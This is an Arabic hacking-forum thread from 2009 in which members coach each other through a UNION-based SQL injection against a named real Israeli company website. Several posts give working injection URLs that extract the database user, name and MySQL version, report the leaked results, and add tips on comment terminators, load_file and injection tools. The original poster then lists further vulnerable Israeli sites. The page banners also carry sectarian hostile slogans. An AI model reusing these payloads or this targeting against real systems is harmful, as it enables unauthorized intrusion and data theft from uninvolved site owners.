عالم المعرفة - Group XP - أهل السنه والجماعه
ضع إعلانك هنا الحوار السني الشيعي تعــــلم تشفير الباتش تشفير السيرفر فك التشفير تشفير الملفات Crypter ضع إعلانك هنا
مسابقه تشفير السيرفرات المقدم Hack.VB.NET ضع إعلانك هنا ضع إعلانك هنا ضع إعلانك هنا

فضائح الخميني ، فضائح الشيرازي ، فضائح الخوئي ، فضائح السيستاني ، فضائح حسن نصر الله ، فضائح مقتدى الصدر ، فضائح المذهب الشيعي ، فضائح الشيعة ، فضائح الرافضة ، فضائح الروافض , افلام , وصور , جرائم المجوس ضدأهل السنه , ومقالات , وتصريحات إعلامية

 
العودة   عالم المعرفة - Group XP - أهل السنه والجماعه > قسم حماية الاجهزة والسيرفرات > أمن المواقع والسيرفرات
تحديث الصفحة شباب الحقن Sql تعالو
تفعيل العضوية استعادة كلمة المرور البحث مشاركات اليوم اجعل كافة الأقسام مقروءة

أمن المواقع والسيرفرات اختراق المواقع , اختراق المنتديات , برنامج اختراق , اختراق السيرفرات , ادوات اختراق , برامج اختراق , تعليم اختراق , شروحات اختراق , دورات اختراق , شل , shell , اخراق سيرفر وندز

إضافة رد
 
LinkBack أدوات الموضوع
قديم 01-02-2009, 04:02 AM   رقم المشاركة : 1 (permalink)
النـور
بانــد






النـور غير متصل

النـور will become famous soon enoughالنـور will become famous soon enough

m3ic7 شباب الحقن Sql تعالو

بسم الله الرحمن الرحيم


مشكله تالت مره أشوفها عند الحقن

تخمين ORDER BY
تمام
UNION ALL SELECT 1,2,3--

تمام بس ما يطلع فيه عمود مصاب ؟؟؟ مثال علي موقع أسرائيلي

أضغط هنا

ياريت اللي بيقالي حل ما يبخل علينا
الله معنا علي من يعادينا






 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 01-02-2009, 05:11 AM   رقم المشاركة : 2 (permalink)
ابو تيله
:: Kaspersky Security Alm3Refh ::
 
الصورة الرمزية ابو تيله







ابو تيله غير متصل

ابو تيله has a spectacular aura aboutابو تيله has a spectacular aura aboutابو تيله has a spectacular aura about

افتراضي رد: شباب الحقن Sql تعالو

مبروك اخوي على الاكتشاف

والله اخي ماعندي خبره

لاكن بفيدك في الي اعرفه وان شاء الله تستفيد

اول شي خطأ عندك في بداية الاستعلام

مثال


كود:
http://www.uni-scope.co.il/products.php?product=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
نهاية الملف المصاب ضفت بدل رقم 1 بــ 1- علشان يبين الخطأ

ونهاية الاستعلام */ احيان مو لازم سواء --لاكن جرب الاثنين في كل مره


راح تشوف طبع لك في الصفحه رقم 2

رقم 2 يكون الجدول الرئيسي هنا تخمن اسم الجدول

طبعا كل جدول يكون داخله حقل from

الان استعلم عن اسم القاعده هذا استعلام القاعده

database()



Uni-scope Optical Systems web site-Legal Terms

تشوف طلع اسم القاعده uniscope_atarplus

طيب استعلم عن اصدار mysql الي راكب على السيرفر

version() هذا الاستعلام بدل رقم 2


Uni-scope Optical Systems web site-Legal Terms

طلع الاصدار

4.1.22-standard-log

قديم

طيب

رقم 2 قلنا نكتب بداله اسم الجدول الرئيسي

نهاية الاستعلام

from+users/*

طبعا users هذا اسم الحقل الي داخل الجدول الرئيسي (مثال)

يكون كذا يعني اسم الحقل الي داخل الجدول users

تبدا تخمين اسامي الجدول والحقول

راح احاول فيه ان حصلة نتيجه رجعت للموضوع

وان شاء الله الاخوان مايقصرون معاك






التوقيع

(-)(اماراتي وافتخر)(-)
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 01-02-2009, 05:26 AM   رقم المشاركة : 3 (permalink)
ابو تيله
:: Kaspersky Security Alm3Refh ::
 
الصورة الرمزية ابو تيله







ابو تيله غير متصل

ابو تيله has a spectacular aura aboutابو تيله has a spectacular aura aboutابو تيله has a spectacular aura about

افتراضي رد: شباب الحقن Sql تعالو

كود:
http://www.uni-scope.co.il/products.php?product=-1+union+select+1,concat(user(),0x3a,version(),0x3e,database()),3,4,5,6,7,8,9,10,11






التوقيع

(-)(اماراتي وافتخر)(-)
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 01-02-2009, 05:32 AM   رقم المشاركة : 4 (permalink)
@الجارح@
عضو نشيط






@الجارح@ غير متصل

@الجارح@ will become famous soon enough@الجارح@ will become famous soon enough

افتراضي رد: شباب الحقن Sql تعالو

.


مآقصـر معآكـ آبو تيله .. : )
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 01-02-2009, 12:42 PM   رقم المشاركة : 5 (permalink)
دمعة فحل
عضو جديد






دمعة فحل غير متصل

دمعة فحل will become famous soon enoughدمعة فحل will become famous soon enough

افتراضي رد: شباب الحقن Sql تعالو

ما شاء الله يا ابو تيله

والله ما قصرت شرحت شرح وافي







 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 01-02-2009, 01:26 PM   رقم المشاركة : 6 (permalink)
the_a_n_g

:: ALM3r3fh GRoup::







the_a_n_g متصل الآن

the_a_n_g will become famous soon enoughthe_a_n_g will become famous soon enough

افتراضي رد: شباب الحقن Sql تعالو

جرب http://www.alm3refh.com/vb/t18033.html (SQL-PwnZ)
راح ينفعك







التوقيع

غائب لظروف خاصة
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 01-02-2009, 02:28 PM   رقم المشاركة : 7 (permalink)
الفهد الاسود
عضو نشيط






الفهد الاسود غير متصل

الفهد الاسود will become famous soon enoughالفهد الاسود will become famous soon enough

افتراضي رد: شباب الحقن Sql تعالو

اخوي ... حقن شل مستحيل والله اعلم
ال load_file('/')=ON
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 01-02-2009, 04:43 PM   رقم المشاركة : 8 (permalink)
النـور
بانــد






النـور غير متصل

النـور will become famous soon enoughالنـور will become famous soon enough

افتراضي رد: شباب الحقن Sql تعالو

بسم الله الرحمن الرحيم
مشكورين غالين علي التوضيح

بعض المواقع الاسرائيله المصابه

إضغط هنا

أضغط هنا

أضغط هنا
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 01-03-2009, 07:28 PM   رقم المشاركة : 9 (permalink)
sec-root

:: ALM3r3fh GRoup::
 
الصورة الرمزية sec-root







sec-root غير متصل

sec-root will become famous soon enoughsec-root will become famous soon enough

افتراضي رد: شباب الحقن Sql تعالو

ايضا على كلام ابوتيله جزاه الله خير اضافة and+1=0+







التوقيع

تَعْصِي الإِله وَأنْتَ تُظْهِرُ حُبَّهُ * هذا محالٌ في القياس بديعُ
لَوْ كانَ حُبُّكَ صَادِقاً لأَطَعْتَهُ * إنَّ الْمُحِبَّ لِمَنْ يُحِبُّ مُطِيعُ
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
إضافة رد

« الموضوع السابق | الموضوع التالي »

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
تبادل خبره في حقن Sql تعالو نستفيد ارجو التثبيت ابو تيله أمن المواقع والسيرفرات 31 01-01-2010 05:58 PM
up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injectio Dra Alsunna [ Videos] 4 11-30-2009 01:28 PM
أفضل 15 أدات خاصة بحقن قواعد البيانات sql the_a_n_g منتدى أدوات وبرامج الإختراق 3 03-08-2009 05:57 PM
sql في حزب كاديما اليهودي النـور أمن المواقع والسيرفرات 5 03-02-2009 10:07 PM
مشكلة بموقع ايراني Sql MasterFouad منتدى المشاكل وحلول و الطلبات والأسئلة 2 02-25-2009 10:49 PM


الساعة الآن 12:12 AM.


روابط مهمة

أقسام المنتدى

الاتصال بنا - السنه - الأرشيف - الأعلى

Powered by vBulletin Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd
لا تتحمل إدارة منتديات عالم المعرفة أية مسؤولية حول أي موضوع يطرح في المنتدى فإن المكتوب يعبر عن رأى صاحبه أو ناقلة